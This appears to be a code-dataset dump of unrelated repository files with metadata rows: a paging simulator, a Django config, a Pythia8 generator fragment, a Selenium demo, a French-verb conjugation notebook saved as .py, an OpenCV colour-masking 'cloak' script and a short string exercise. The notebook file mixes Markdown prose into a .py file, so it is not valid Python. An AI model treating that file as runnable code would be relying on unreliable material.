    """Parse a '[7,5,8]'-style command-line string into a list of ints.

    :param page_sequence: bracket-enclosed, comma-separated page numbers
    :return: list of ints
    """
    sequence = page_sequence[1:len(page_sequence)-1].split(',')
    # int() instead of eval(): page numbers come from the command line, and
    # arbitrary user input must never be evaluated as code. int() also
    # tolerates surrounding whitespace like '[7, 5]'.
    return [int(page) for page in sequence]
def create_random_pages(pages):
    """Return int(pages) random page numbers, each uniformly drawn from 0-9."""
    total = int(pages)
    return [int(random.random() * 10) for _ in range(total)]
def main():
    """Parse argv, build or accept a page sequence, and run all three simulators.

    argv[1] is the frame size; argv[2] (optional) is either a sequence length
    or a bracket-enclosed explicit page sequence.
    """
    # int() rather than eval(): the frame size is user input and must be a
    # plain integer, never evaluated as code.
    frame_size = int(sys.argv[1])
    if len(sys.argv) == 3 and sys.argv[2][0] != '[':
        # Sequence length has been provided
        page_sequence = create_random_pages(sys.argv[2])
    elif len(sys.argv) == 3 and sys.argv[2][0] == '[':
        # Page sequence has been provided
        page_sequence = process_pages(sys.argv[2])
    else:
        # Sequence length has not been provided. Choose a random sequence between 10 and 50
        page_sequence = create_random_pages(random.randint(10, 50))
    # The reporting block was duplicated verbatim in all three branches of the
    # original; hoisted here so it exists exactly once.
    print('\nPage sequence to be used: ', page_sequence, '\n')
    print('FIFO ', FIFO(frame_size, page_sequence), 'page faults \n')
    print('LRU ', LRU(frame_size, page_sequence), 'page faults \n')
    print('OPT ', OPT(frame_size, page_sequence), 'page faults \n')
if __name__ == '__main__':
    # A frame size is mandatory; the format of the optional second argument is
    # decided inside main().
    if len(sys.argv) < 2:
        print('Usage: python paging.py frame_size\nOR\npython paging.py frame_size sequence_length\nOR\npython '
              'paging.py frame_size page_sequence(as a square-bracket enclosed comma-separated string e.g [7,5,8,4,'
              '6])')
    else:
        main()
|
[
"netshitanganimoses@gmail.com"
] |
netshitanganimoses@gmail.com
|
2753a2f1b8978475f243ef3e9a55becc93d2311b
|
891632ddf75dd51d27a84b6bb4425be48f4a1dc3
|
/posts/apps.py
|
00ec9d735e522532b6a331245b6e4a0523733c49
|
[] |
no_license
|
Daniel-Alba15/Instagram-clone
|
a0c554abb6332c7deee743b150ad6ad2db609f34
|
7aab5794d089552d056eb7986d9beab40c207d33
|
refs/heads/master
| 2023-04-16T15:58:12.065171
| 2021-04-13T04:00:44
| 2021-04-13T04:00:44
| 338,584,624
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 111
|
py
|
from django.apps import AppConfig
class PostsConfig(AppConfig):
    """Django application configuration for the posts app."""
    name = 'posts'
    verbose_name ='Posts'
|
[
"danielorlandoa8@gmail.com"
] |
danielorlandoa8@gmail.com
|
353562321539d9ccedca62c846aca50ab793e19c
|
79b1d3d8ffbda5297fff6fefe2528e303bf2110a
|
/RSGGenFragment/RSToGG/RSGravitonToGluonGluon_W-0p3_M_1500_TuneCUETP8M1_13TeV_pythia8_cfi.py
|
12c5bb5688841800cd878b05928dba9baf198d70
|
[] |
no_license
|
yguler/MCFragments-1
|
25745a043653d02be3a4c242c1a85af221fc34b3
|
7c4d10ee59e00f997221109bf006819fd645b92f
|
refs/heads/master
| 2021-01-13T14:09:12.811554
| 2016-12-11T15:57:37
| 2016-12-11T15:57:37
| 76,184,433
| 0
| 0
| null | 2016-12-11T15:59:22
| 2016-12-11T15:59:22
| null |
UTF-8
|
Python
| false
| false
| 1,311
|
py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
# Pythia8 generator fragment: RS graviton produced via gluon fusion and decayed
# to two gluons at a 13 TeV centre-of-mass energy (process/mass settings are in
# the processParameters vstring below).
generator = cms.EDFilter("Pythia8GeneratorFilter",
                         comEnergy = cms.double(13000.0),
                         crossSection = cms.untracked.double(0.00000136),
                         filterEfficiency = cms.untracked.double(1),
                         maxEventsToPrint = cms.untracked.int32(0),
                         pythiaHepMCVerbosity = cms.untracked.bool(False),
                         pythiaPylistVerbosity = cms.untracked.int32(1),
                         PythiaParameters = cms.PSet(
        pythia8CommonSettingsBlock,
        pythia8CUEP8M1SettingsBlock,
        # 5100039 is the G* particle id: set its mass (m0 = 1500), switch off
        # all decays, then re-enable only the decay to gluons (id 21).
        processParameters = cms.vstring(
            'ExtraDimensionsG*:gg2G* = on',
            'ExtraDimensionsG*:kappaMG = 2.493343987',
            '5100039:m0 = 1500',
            '5100039:onMode = off',
            '5100039:onIfAny = 21'
        ),
        parameterSets = cms.vstring('pythia8CommonSettings',
                                    'pythia8CUEP8M1Settings',
                                    'processParameters',
                                    )
        )
                         )
ProductionFilterSequence = cms.Sequence(generator)
|
[
"emine.gurpinar@cern.ch"
] |
emine.gurpinar@cern.ch
|
bedffb393db9fa4276cd2bbbb36fdd19113a52af
|
d29b4d3bf8c0447dfa05fbf55105a6c5a6049e98
|
/lianxicode/do1_find_element.py
|
ddeb0bf84ddd7485ac348de761e8332b1c13acf4
|
[] |
no_license
|
gaoyang1224/UI
|
da9193396019ef69e0bd3d667d01bf00291189b7
|
daaa957365fa9ad6fb2f6ee5e377d752e2f1b676
|
refs/heads/master
| 2023-05-13T17:31:40.885877
| 2021-06-07T23:51:54
| 2021-06-07T23:51:54
| 371,928,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 629
|
py
|
from selenium import webdriver
driver = webdriver.Chrome()
url = 'http://www.douban.com'
driver.get(url)
ele = driver.find_element_by_name('q')
print(ele)
# 打印标签名
print(ele.tag_name)
# 属性和方法
print(ele.send_keys('你好呀'))
# 获取元素的属性
print(ele.get_attribute('maxlength'))
# find_element和find_elements的区别
ele = driver.find_elements_by_name('q')
print(ele)
"""find_element得到的是一个WebElement的对象
find_elements得到的是一个列表"""
"""
try:
driver.find_element_by_name('q')
print("元素存在")
except:
print("元素不存在")
"""
driver.close()
|
[
"15195989321@163.com"
] |
15195989321@163.com
|
c652632d211658bbfdb06e51eb66e4c66077b4ab
|
23f7a8233ef6ac3d84ad46b3e2b7b65726b64949
|
/_build/jupyter_execute/curriculum-notebooks/Languages/FrenchVerbCodingConjugation/french-verb-coding.py
|
1b500468223ac4d339f79662c7e09cbb01752e9a
|
[
"LicenseRef-scancode-unknown-license-reference",
"CC-BY-4.0",
"MIT",
"LicenseRef-scancode-public-domain"
] |
permissive
|
BryceHaley/curriculum-jbook
|
75de835177bd6abef8150e951e933ff194530f89
|
d1246799ddfe62b0cf5c389394a18c2904383437
|
refs/heads/master
| 2023-03-04T11:50:42.628281
| 2021-02-19T00:38:26
| 2021-02-19T00:38:26
| 328,003,863
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,465
|
py
|

<a href="https://hub.callysto.ca/jupyter/hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Fcallysto%2Fcurriculum-notebooks&branch=master&subPath=Languages/FrenchVerbCodingConjugation/French-Verb-Coding.ipynb&depth=1" target="_parent"><img src="https://raw.githubusercontent.com/callysto/curriculum-notebooks/master/open-in-callysto-button.svg?sanitize=true" width="123" height="24" alt="Open in Callysto"/></a>
# French Verb Coding
----
## Introduction
In this Jupyter Notebook by Callysto you will learn about French verb conjugation and some basics of programming in Python.
Mastering the basics of verb conjugation is essential to reading and writing in French. There are some basic rules and exceptions that should be addressed and to learn those details, you should look at this other Callysto notebook: [French-Verb-Conjugation](CC-186-French-Verb-Coding.ipynb)
For this notebook, we will only look at the **regular** French verbs and see how we can use them in a program to conjugate automatically. Along the way you will gain some insight into how this notebook was made and thus gain some exposure to some programming concepts.
#### Necessary background
- Some basic knowledge of French
- Elementary Python syntax
#### Allons-y!
## Startup code
This notebook will use Python code. To get started, we need to load in a few modules that have useful "helper" functions to get us going. Be sure to run the following code to get these modules activated.
from IPython.display import display, clear_output, Markdown
import ipywidgets as widgets
import plotly as py
import plotly.graph_objs as go
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
init_notebook_mode(connected=True)
## Personal pronouns
In order to start conjugating verbs, we must first learn what are the personal pronouns in French. These correspond to the usual English pronouns like I, you, he, she, etc. It is nice to put this into a table so the display is pretty.
We can make three lists or words, which are just strings of characters surrounded by quotes which indicate the start and end of each word. These three lists are stored as **variables,** as follows:
```
french = ['je','tu','elle, il, on','nous','vous','elles, ils']
english = ['I','you','she, he, one','we','you (plural or formal)','they']
person = ['First','Second','Third','First (plural)','Second (plural)','Third (plural)']
```
We then construct a table using some standard Python code, from a package called 'Plotly.' Don't worry too much about the details -- you can read about them on the Plotly web pages. For now, just notice that our three variables show up in the code at this line:
```
values = [person,french,english],
```
That line tells the table builder where to get our words, to put into the table.
With this following code, we build and display a table showing the subject pronouns in French. These pronouns will be used to separate the different cases of verb conjugation.
#table for personal pronouns using plotly
# Three parallel lists: one entry per pronoun row shown in the table.
french = ['je','tu','elle, il, on','nous','vous','elles, ils']
english = ['I','you','she, he, one','we','you (plural or formal)','they']
person = ['First','Second','Third','First (plural)','Second (plural)','Third (plural)']
trace0 = go.Table(
    columnorder = [1,2,3],
    columnwidth = [10,10],
    # Header row: dark background, white text.
    header = dict(
        values = ['Person','French','English'],
        line = dict(color = 'rgb(0,0,0)'),
        fill = dict(color = 'rgb(0,35,48)'),
        align = ['center','center'],
        font = dict(color = 'white', size = 16),
        height = 40
    ),
    # Body cells: the three lists above, one column each.
    cells = dict(
        values = [person,french,english],
        line = dict(color = 'black'),
        fill = dict(color = 'rgb(95,102,161)'),
        align = ['center', 'center'],
        font = dict(color = 'white', size = 14),
        height = 30
    )
)
layout = dict(
    width=750,
    height=450
)
data = [trace0]
fig = dict(data = data, layout = layout)
iplot(fig)
Our verb conjugation rules will be based on these personal pronouns, so it is good to get familiar with their translations. French makes a distinction between all of these different tenses based on their person, whether or not they are masculine or feminine, and if they are plural or singular.
## Regular "er" verbs
Let's now look at the general rubric for conjugating verbs that end in **er** in the present tense.
We will illustrate this with the verb "parler" (to speak). The stem of the verb parler is "parl-". We conjugate it by adding on the endings "e", "es", "e", "ons", "ez" "ent" for the corresponding pronouns. We put these into the data structure for the table, and build it as follows:
(Be sure to run the following cell, to generate the table.)
# Conjugation of 'parler': pronoun vs. fully conjugated form.
french = ['je','tu','elle, il, on','nous','vous','elles, ils']
# NOTE(review): `stem` and `ending` are defined but not displayed in the table
# below (only `french` and `conjug` are) — possibly leftovers from an earlier
# three-column version.
stem = ['parl-','parl-','parl-','parl-','parl-','parl-']
ending = ['e','es','e','ons','ez','ent']
conjug = ['parle','parles','parle','parlons','parlez','parlent']
trace0 = go.Table(
    columnorder = [1,2],
    columnwidth = [10,10],
    header = dict(
        values = ['Pronoun','Conjugation'],
        line = dict(color = 'rgb(0,0,0)'),
        fill = dict(color = 'rgb(0,35,48)'),
        align = ['center','center'],
        font = dict(color = 'white', size = 16),
        height = 40
    ),
    cells = dict(
        values = [french,conjug],
        line = dict(color = 'black'),
        fill = dict(color = 'rgb(95,102,161)'),
        align = ['center', 'center'],
        font = dict(color = 'white', size = 14),
        height = 30
    )
)
layout = dict(width=500, height=450)
data = [trace0]
fig = dict(data = data, layout = layout)
iplot(fig)
This can be taken as the general rule for conjugating **er** verbs in the present tense. All you need to do is find the *stem* of the verb, which was parl- in this case, and then apply these endings to figure out how to conjugate the verb for every personal pronoun.
We now try to apply this using code.
## Coding Examples
---
How could one write code to see if someone conjugated a verb correctly? The following exercise will test your knowledge of French verb conjugation and also introduce you to some aspects of coding.
Let's start the coding with an example. I ask you to input an answer to: "Conjugate the verb *fermer* to the first person singular in the present tense". How do I check whether or not you input the correct answer?
In regular Python, to get a user to input a value, we create a *variable* that holds the user input:
``` python
x = input()
```
then test that variable to see if it is correct or not.
However, in a Jupyter notebook like this one, it is better to create a **text widget** which is simply a small text box on the screen where the user can type in his or her answer. We create and display the widget two commands like this:
``` python
aText = widgets.Text(value = None,
placeholder = "Conjugate 'fermer' present tense, 1st person singular.")
display(aText)
```
The variable aText just refers to the text box that will be on the screen, and the placeholder is the instruction that will be placed in that box.
When the user enters a word in the box, we want the computer to *do something.* In this case, we should define a function that does what we want. Here is a definition of the *doIt* function that does what we want: tests the text in the box to see if it is correct or not:
``` python
def doIt(x):
clear_output()
display(x)
if x.value != None:
if x.value == "ferme":
print('Correct!')
else:
print('Incorrect, please try again. Make sure you use only letters, no quotes, no spaces.')
return
```
In this function, the variable x just points to our text box, and x.value is a **string**, which a short list of characters, that the user has typed into the box. This will be what we use to check against the correct answer. In our case, the correct answer is "ferme" and we use the **if** statement to check.
The code above deserves some explanation.
- We used the quotations around the answer (`'ferme'`) as this is how Python recognizes strings. Since our variable x.value was held as a string we want to check it against something that is itself a string.
- If you want to check that the variable is equal to the correct answer we used ==.
- The `print` statement was the operation that we chose to do when the `if` statement was fulfilled.
- The if statement requires the colon at the end of the statement and whatever operation you choose to perform given that the statement is fulfilled needs to be indented within the statement.
Finally, we must tell the aText object to attach the doIt function to itself, so it runs the code once the user enters the text and hits the return button.
The final code looks like this:
# Text box where the learner types the conjugated verb; doIt runs on submit.
aText = widgets.Text(value = None,
                    placeholder = "Conjugate 'fermer' present tense, 1st person singular.")
display(aText)
def doIt(x):
    # x is the Text widget; x.value is the string the learner entered.
    clear_output()
    display(x)
    if x.value != None:
        if x.value == "ferme":
            print('Correct!')
        else:
            print('Incorrect, please try again. Make sure you use only letters, no quotes, no spaces.')
    return
aText.on_submit(doIt)
** Try it! ** Enter some text in the box above to see what happens for the correct and incorrect cases.
## Generalizing
---
Code that has multiple uses, and is more broadly useful, is typically a lot more valuable. In our case, how could we write a program that checks the correct answer for any verb, tense, and personal pronoun? This would be a generalization of the simple case that we constructed above. This is a lot more of a complex problem that will have to be broken down.
The exercise will be: Conjugate the verb "___ -er" in the present tense in every subject.
Since we have knowledge of the endings for "-er" verbs in the present tense, our problem reduces to analyzing if each of the student's answers fits the form that the conjugated verb should take in that subject. Steps we require then:
1. We need to extract the root from each verb.
2. See if the remainder of the verb has the correct ending.
3. Make sure all answers are correct.
To achieve this we will employing the use of a *list*. A list is a data type which has some sort of ordering to it. The ordering gives us the means to *index* an *element* of the list. For example, we have the list:
```python
subjects = ['je','tu','il, elle, on','nous','vous','ils/elles']
```
(Note the square brackets)
"subjects" is a comma separated list of string objects. We can do things like index the list:
```python
subjects[0] = 'je'
subjects[1] = 'tu'
subjects[2] = 'il, elle, on'
```
Notice how the indexing starts from 0. This means if you have **n** elements in a list `v`, and you want to index the last element of the list, you would write `v[n-1]`.
What is the value of `subjects[4]`? Run the following code to test yourself:
# Simple list test: checks the reader's understanding of zero-based indexing.
a = widgets.Text(value = None, placeholder = "What is the value of subjects[4]?")
display(a)
def callback(sender):
    # Redraw the question box, then grade the current answer.
    clear_output()
    display(a)
    if a.value != None:
        if a.value == "vous":
            print('Correct!')
        if a.value != "vous":
            print('Incorrect, please try again. Make sure you use only letters, no quotes, no spaces.')
    return
a.on_submit(callback)
A more useful list to us would be:
``` python
endings = ['e','es','e','ons','ez','ent']
```
These are the verb endings given for conjugating "-er" verbs in the present tense. Now we just need some means of analyzing their answer to see if they used the right ending.
Say that we store all of their answers in a list like:
```python
answers = ['x1','x2','x3','x4','x5','x6']
```
The elements of the list, labelled "x1, x2, ..." are variables, which are themselves strings. Their position in the list indicates which subject they were trying to conjugate to, for instance x1 $\rightarrow$ 'je'. The convenience of storing the answers like this will become apparent soon.
If we wanted to perform a simple check, say whether or not they simply got the correct form, and not necessarily the correct spelling, we would use the following:
```python
for i in range(0,6):
n = len(endings[i])
if answers[i][-n:] != endings[i]:
print('Incorrect')
```
**What does this do?**
This short little piece of code checks to see if they got the right ending. Let's look at some of the tools that it uses.
**What does the `for` statement do?**
```python
for i in range(0,6):
```
This is another essential programming tool known as the `for` loop. Within the `for` loop, the indented code block is executed, then the next iteration of the loop is performed, in our case the index $i$ is increased to $i+1$. This continues until all iterations are done. It provides a means of counting or iterating through a process. In our case we want to iterate over every element in the list and perform the check in the `if` statement.
Notice the code `range(0,6)` tells us the index `i` will start at `i=0` and end at `i=5`. It stops before 6.
**The `if` statement**
Again we used the "!=" to see if two strings are not equal to each other. Firstly, we have declared a variable in the loop:
```python
n = len(endings[i])
```
This is simply the length of the ending. So for `endings[5]`, which is the string 'ent', the length is `n = 3`. This gives us a way of checking the last letters of the respective answer. We accomplish by using:
```python
answers[i][-n:]
```
The first index, `answers[i]` gives us the `i+1` element of the list answers (since we begin indexing from 0). e.g. `answers[3] = 'x4'`. The second index we used, `answers[i][-n:]`, indexes the element of the list. How are we indexing an already indexed list you might ask? Well, this is because a string is conveniently broken up into the characters that make it up. This gives us a way of indexing any "letter" of the string. For example, if `x1 = 'mange'` then `x1[3] = 'g'`. This is very nice for us, since we can employ this to check the ending of their answers. To index the last element of a string, or a list, we use the negative. e.g. `x1[-1] = 'e'`. To take out an entire section of a list or string we used "slice notation", this is why there is the extra colon. e.g. `x1[-3:] = 'nge'`. In our case we only wanted to index the last `n` letters of the string because this is the amount of letters in the ending that we wanted to check against. If all the answers were correct then the entire `for` loop would run and the `if` statement would never be fulfilled!
----
Now this was quite a bit of information, so let's test your knowledge on what we've done so far and then we'll work on generalizing this further for a different case.
For the lists:
```python
endings = ['e','es','e','ons','ez','ent']
answers = ['mange','manges','mange','mangeons','manger','mangent']
```
# Four-question quiz on list indexing and `for` loops.  Each answer box has
# its own callback; every callback clears and redraws all four questions so
# the notebook output keeps its order, then grades only its own answer.
ques1 = "Which element of answers is incorrect? Use index notation , i.e. `answers[]`"
ques2 = "What part should be changed? Use the double index notation, i.e. `answers[][]`"
ques3 = "What should the ending be? Use index notation again, i.e. `endings[]`"
ques4 = "If I wanted to check the first three answers, how would the `for` loop initial statement look like? \
Please use `i` as the index."
ans1 = widgets.Text(value = None)
ans2 = widgets.Text(value = None)
ans3 = widgets.Text(value = None)
ans4 = widgets.Text(value = None)
def callback1(sender):
    # Grades question 1: which answer is wrong ('manger' at index 4).
    if ans1.value != None:
        clear_output()
        display(Markdown(ques1))
        display(ans1)
        if ans1.value == 'answers[4]' or ans1.value == 'answers[-2]':
            display(Markdown('Correct!'))
        else:
            display(Markdown('Not quite! Please try again.'))
        display(Markdown(ques2))
        display(ans2)
        display(Markdown(ques3))
        display(ans3)
        display(Markdown(ques4))
        display(ans4)
    return
def callback2(sender):
    # Grades question 2: which slice of that answer should change.
    if ans2.value != None:
        clear_output()
        display(Markdown(ques1))
        display(ans1)
        display(Markdown(ques2))
        display(ans2)
        if ans2.value == 'answers[4][4:]' or ans2.value == 'answers[4][-2:]' or \
           ans2.value == 'answers[4][-1]' or ans2.value == 'answers[4][5]':
            display(Markdown('Correct!'))
        else:
            display(Markdown('Not quite! Please try again. You might need a colon in there.'))
        display(Markdown(ques3))
        display(ans3)
        display(Markdown(ques4))
        display(ans4)
    return
def callback3(sender):
    # Grades question 3: which ending belongs at that position.
    if ans3.value != None:
        clear_output()
        display(Markdown(ques1))
        display(ans1)
        display(Markdown(ques2))
        display(ans2)
        display(Markdown(ques3))
        display(ans3)
        if ans3.value == 'endings[4]' or ans3.value == 'endings[-2]':
            display(Markdown('Correct!'))
        else:
            display(Markdown('Not quite! Please try again.'))
        display(Markdown(ques4))
        display(ans4)
    return
def callback4(sender):
    # Grades question 4: the `for` loop header over the first three answers.
    if ans4.value != None:
        clear_output()
        display(Markdown(ques1))
        display(ans1)
        display(Markdown(ques2))
        display(ans2)
        display(Markdown(ques3))
        display(ans3)
        display(Markdown(ques4))
        display(ans4)
        if ans4.value == 'for i in range(0,3):' or ans4.value == 'for i in range(3):':
            display(Markdown('Correct!'))
        else:
            display(Markdown("Not quite! Please try again. Don't forget the colon :"))
    return
ans1.on_submit(callback1)
ans2.on_submit(callback2)
ans3.on_submit(callback3)
ans4.on_submit(callback4)
# Initial render of all four questions and answer boxes.
display(Markdown(ques1))
display(ans1)
display(Markdown(ques2))
display(ans2)
display(Markdown(ques3))
display(ans3)
display(Markdown(ques4))
display(ans4)
## Automatic conjugation
Of course, the rules for conjugation for the regular verbs are very straightforward. So we could write code to handle these by computer. The basic rule is to decide whether the verb is an **er**, **ir**, or **re** verb. Based on that, we decide which endings to add onto the stem.
For instance, a simple **if** statement can check whether the verb is an **er** type, find the stem, and then compute the conjugations appropriately:
```
if aVerb.value[-2:]=='er':
stem = aVerb.value[:-2]
for i in range(6):
conjug[i] = stem+er_endings[i]
```
To handle the three different regular cases, we should have lists for the three different types of endings:
```
er_endings = ['e','es','e','ons','ez','ent']
ir_endings = ['is','is','it','issons','issez','issent']
re_endings = ['s','s','','ons','ez','ent']
```
To put the code together, we can have three **if** statements to test which of the three types of verbs we have, then add on the appropriate endings to the stem. Some code to do this looks like the following. Try running it yourself.
# Automatic conjugation of regular -er / -ir / -re verbs in the present tense.
pronouns = ['je','tu','elle, il, on','nous','vous','elles, ils']
er_endings = ['e','es','e','ons','ez','ent']
ir_endings = ['is','is','it','issons','issez','issent']
re_endings = ['s','s','','ons','ez','ent']
stem = ''
# FIX: `conjug` was written to (conjug[i] = ...) in the callback without ever
# being initialized in this cell, raising a NameError unless an earlier cell
# happened to define it.  Pre-allocate one slot per pronoun.
conjug = [''] * 6
aVerb = widgets.Text(value = None, description = 'Infinitive', placeholder = "Enter a verb")
display(aVerb)
def callback5(sender):
    # Classify the entered infinitive by its last two letters, fill `conjug`
    # with stem + ending for all six persons, and display the result.
    if aVerb.value != None:
        if aVerb.value[-2:] == 'er':
            stem = aVerb.value[:-2]
            for i in range(6):
                conjug[i] = stem + er_endings[i]
            clear_output()
            display(aVerb)
            display(Markdown('An **er** verb with stem **' + stem + '-**' + ' and conjugations:'))
            display(conjug)
            return
        if aVerb.value[-2:] == 'ir':
            stem = aVerb.value[:-2]
            for i in range(6):
                conjug[i] = stem + ir_endings[i]
            clear_output()
            display(aVerb)
            display(Markdown('An **ir** verb with stem **' + stem + '-**' + ' and conjugations:'))
            display(conjug)
            return
        if aVerb.value[-2:] == 're':
            stem = aVerb.value[:-2]
            for i in range(6):
                conjug[i] = stem + re_endings[i]
            clear_output()
            display(aVerb)
            display(Markdown('An **re** verb with stem **' + stem + '-**' + ' and conjugations:'))
            display(conjug)
            return
        # Fall-through: not a regular -er/-ir/-re infinitive.
        # (typo fixed in the message: "recongnize" -> "recognize")
        clear_output()
        display(aVerb)
        display(Markdown("I don't recognize this kind of verb. Try again."))
    return
aVerb.on_submit(callback5)
## Exceptions
Of course, this code does not handle exceptions, only the three regular cases.
#### Exercise
Try adding an **if** statement to test for an exception, say if the verb is "Avoir." In this case, the conjugation will be `['ai','as','a','avons','avez','ont']`. See if you can modify the code above to handle this special case.
Should you test for exceptions first in your code, or test for the three regular cases first?
Once you succeed at that, try handling the exceptional verb "Être."
## Making it nice
Perhaps you liked the nice tables that we used to display verb conjugations, as in the notes above. We can add a function to our code that replicates this table. Our code then changes, to display the table instead of the list of conjugations. The resulting code is as follows. Note the newly defined function `displayTable()` which builds the table for us.
# Same conjugation logic as above, but results are rendered as a Plotly table.
pronouns = ['je','tu','elle, il, on','nous','vous','elles, ils']
er_endings = ['e','es','e','ons','ez','ent']
ir_endings = ['is','is','it','issons','issez','issent']
re_endings = ['s','s','','ons','ez','ent']
stem = ''
# FIX: `conjug` was used by the callback and by displayTable2 without ever
# being initialized in this cell (NameError unless defined earlier).
conjug = [''] * 6
aVerb2 = widgets.Text(value = None, description = 'Infinitive', placeholder = "Enter a verb")
display(aVerb2)
def callback6(sender):
    # Classify the infinitive, fill `conjug`, then render the table.
    if aVerb2.value != None:
        if aVerb2.value[-2:] == 'er':
            stem = aVerb2.value[:-2]
            for i in range(6):
                conjug[i] = stem + er_endings[i]
            clear_output()
            display(aVerb2)
            display(Markdown('An **er** verb with stem **' + stem + '-**'))
            displayTable2()
            return
        if aVerb2.value[-2:] == 'ir':
            stem = aVerb2.value[:-2]
            for i in range(6):
                conjug[i] = stem + ir_endings[i]
            clear_output()
            display(aVerb2)
            display(Markdown('An **ir** verb with stem **' + stem + '-**'))
            displayTable2()
            return
        if aVerb2.value[-2:] == 're':
            stem = aVerb2.value[:-2]
            for i in range(6):
                conjug[i] = stem + re_endings[i]
            clear_output()
            display(aVerb2)
            display(Markdown('An **re** verb with stem **' + stem + '-**'))
            displayTable2()
            return
        # Fall-through: not a regular verb.
        # (typo fixed in the message: "recongnize" -> "recognize")
        clear_output()
        display(aVerb2)
        display(Markdown("I don't recognize this kind of verb. Try again."))
    return
aVerb2.on_submit(callback6)
def displayTable2():
    # Render `pronouns` and `conjug` side by side as a two-column table.
    trace0 = go.Table(
        columnorder = [1,2],
        columnwidth = [10,10],
        header = dict(
            values = ['Pronoun','Conjugated'],
            line = dict(color = 'rgb(0,0,0)'),
            fill = dict(color = 'rgb(0,35,48)'),
            align = ['center','center'],
            font = dict(color = 'white', size = 16),
            height = 40
        ),
        cells = dict(
            values = [pronouns,conjug],
            line = dict(color = 'black'),
            fill = dict(color = 'rgb(95,102,161)'),
            align = ['center', 'center'],
            font = dict(color = 'white', size = 14),
            height = 30
        )
    )
    layout = dict(width=500, height=450)
    data = [trace0]
    fig = dict(data = data, layout = layout)
    iplot(fig)
## Many exceptions
Of course, French has many exceptions to the rules for conjugating verbs. To write code to handle them all, you could consider creating a list will all the exceptions in it, and a corresponding list of conjugations for each exception.
Try this out if you like -- this is an interesting exercise in understanding the complexity of a language, as not everything is simply a simple set of rules. It is also an interesting exercise in how to make code that can handle such complexity.
---
## Conclusion
In this Jupyter Notebook by Callysto you learned the basics of French verb conjugation in the present tense. You also learned about some basic aspects used in programming such as `for` loops, `if` statements. You additionally learned about strings, lists, and indexing. You were also challenged to see to create your own program for dealing with irregular verbs.
We saw that we could expose the structure of the French verb conjugation rules to compose a program that creates the correct responses to conjugate a verb in the present tense. This is somewhat of a hallmark of coding. Taking some sort of structure of the problem at hand and exposing in the form of generalizable and applicable written code. Breaking down problems in this fashion is essential to computational thinking.
Je vous remercie d'avoir essayé les exercices donnés.
[](https://github.com/callysto/curriculum-notebooks/blob/master/LICENSE.md)
|
[
"me@example.com"
] |
me@example.com
|
1669ed2d537f548a399a65c58ed375f14264d992
|
99afb3dac479339ce4a78b8526607944814065c5
|
/invisibilit-cloak-cv-project.py
|
68ad0ec6bc2805a073c2a4b321bf1a174eade6e5
|
[] |
no_license
|
lucciffer/Cloak-of-invisibility
|
ea633b4229148a3eeeab7e6f02147658b7468984
|
631bc1beeddb4eb89c79acd4b3392f5c2f2afd0b
|
refs/heads/main
| 2023-02-08T22:59:38.934739
| 2020-12-30T08:22:05
| 2020-12-30T08:22:05
| 325,494,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,185
|
py
|
# Invisibility-cloak demo: pixels that look red in the live camera feed are
# replaced with a background frame captured at startup, so a red cloth
# appears "transparent".
import numpy as np
import cv2
import time

cap = cv2.VideoCapture(0)
time.sleep(2)  # give the camera a moment to warm up
background = 0
# Grab a number of frames so the sensor settles; keep the last as background.
for _ in range(30):
    ret, background = cap.read()

while cap.isOpened():
    ret, frame = cap.read()
    if not ret:
        break
    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    # Red wraps around the hue axis, so threshold two hue bands and combine.
    lo = np.array([0, 120, 70])
    hi = np.array([10, 255, 255])
    red_low_band = cv2.inRange(hsv, lo, hi)
    lo = np.array([170, 120, 70])
    hi = np.array([180, 255, 255])
    red_high_band = cv2.inRange(hsv, lo, hi)
    cloak_mask = red_low_band + red_high_band
    # Remove speckle noise, then grow the mask slightly to cover edges.
    cloak_mask = cv2.morphologyEx(cloak_mask, cv2.MORPH_OPEN, np.ones((3, 3), np.uint8), iterations=2)
    cloak_mask = cv2.morphologyEx(cloak_mask, cv2.MORPH_DILATE, np.ones((3, 3), np.uint8), iterations=1)
    visible_mask = cv2.bitwise_not(cloak_mask)
    # Background shows through the cloak region; the rest keeps live pixels.
    cloak_pixels = cv2.bitwise_and(background, background, mask=cloak_mask)
    scene_pixels = cv2.bitwise_and(frame, frame, mask=visible_mask)
    finalOutput = cv2.addWeighted(cloak_pixels, 1, scene_pixels, 1, 0)
    cv2.imshow('invisibility cloak!', finalOutput)
    if cv2.waitKey(10) == 27:  # ESC exits
        break

cap.release()
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
lucciffer.noreply@github.com
|
5b4c21d5f50fa349555f06ee48bc17ba21d6fd47
|
e7bdba95eea50797b4254b8643564511a84f5937
|
/problem_solving/different_problem/acronym.py
|
609128d08ada3bb7353c488b5f85a19fe7183447
|
[] |
no_license
|
abiryusuf/Python_Algorithms
|
04bb54f7e6f733b1a38f2b27583e71274535b8ee
|
590809510fde74407a6a75e5c889cc1969d78ff8
|
refs/heads/master
| 2023-08-28T01:31:21.995984
| 2021-10-27T16:08:30
| 2021-10-27T16:08:30
| 391,495,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 838
|
py
|
# Demo input: str.split() with no argument breaks the phrase on whitespace.
info = "I am abir"
x = info.split()
print(x)
def myFun(str):
    """Return the acronym of a phrase: the upper-cased first letter of each word.

    Note: the parameter shadows the builtin ``str``; the name is kept for
    backward compatibility with existing callers.
    """
    # split() with no argument collapses repeated whitespace, so empty
    # "words" never occur and word[0] is always safe; join avoids the
    # original quadratic string concatenation.
    return "".join(word[0].upper() for word in str.split())
print(myFun(info))  # expected: "IAA"
# Dead experiment kept from development (prints each character of `info`):
# for i in range(len(info)):
#     z = info[i]
#     print(z)
def reverse(str):
    """Return *str* reversed.

    Uses slice reversal instead of the original character-by-character
    prepend, which built a new string per iteration (quadratic time).
    Parameter name kept for compatibility (it shadows builtin ``str``).
    """
    return str[::-1]
print(reverse(info))  # expected: "riba ma I"
def plaindron(str):
    """Return True if *str* is a palindrome (reads the same reversed).

